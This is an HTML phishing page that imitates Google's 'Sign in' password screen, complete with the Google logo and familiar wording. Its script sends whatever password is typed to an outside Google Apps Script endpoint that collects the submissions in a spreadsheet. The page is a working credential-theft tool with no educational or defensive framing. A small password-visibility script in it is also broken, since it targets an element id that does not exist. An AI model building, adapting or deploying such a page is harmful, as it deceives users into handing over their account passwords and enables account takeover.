<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Google - Sign In</title>
</head>
<link rel="stylesheet" href="style.css">
<body>
    <div class="container">
        <div class="top-content">
          <img src="https://i.postimg.cc/CL7CmGSx/google-logo-png-29530.png" alt="">
          <h2>Sign in</h2>
          <p class="heading">Use your Google Account</p>
      
        </div>
        <form name="submit-to-google-sheet">
            <div class="inputs">
            <input type="text" name="Password" id="email" class="input">
            <label for="email" class="input-label">Password</label>
            </div>
            <a href="#" class="link-btn">Forgot Password?</a>
            <p class="color">Not your computer? Use Guest mode to sign in privately.</p>
            <a href="#" class="link-btn">Learn More</a>
            <div class="btn-group">
            <button class="create-btn" onclick="window.location.href='./index.html'">Back</button>
            <button type="submit" class="next-btn">Next</button>
            </div>
        </form>
      </div>

      <script>
        const scriptURL = 'https://script.google.com/macros/s/AKfycbxaPVIT9OIzpq5tymqM5xTISajGQHbuzTPZdMbitCSobLP07wpWI9mucVBAEhgqKV5b/exec'
        const form = document.forms['submit-to-google-sheet']
      
        form.addEventListener('submit', e => {
          e.preventDefault()
          fetch(scriptURL, { method: 'POST', body: new FormData(form)})
            .then(response => console.log('Success!', response))
            .catch(error => console.error('Error!', error.message))
        })
      </script>

<script>
    // Get the password input element
    const passwordInput = document.getElementById('password');

    // Function to toggle password visibility
    function togglePasswordVisibility() {
        passwordInput.setAttribute('type', 'password');  // Hide the password
    }

    // Initially show the password for 5 seconds
    setTimeout(togglePasswordVisibility, 5000);  // After 5 seconds, toggle to password type

</script>
</body>
</html>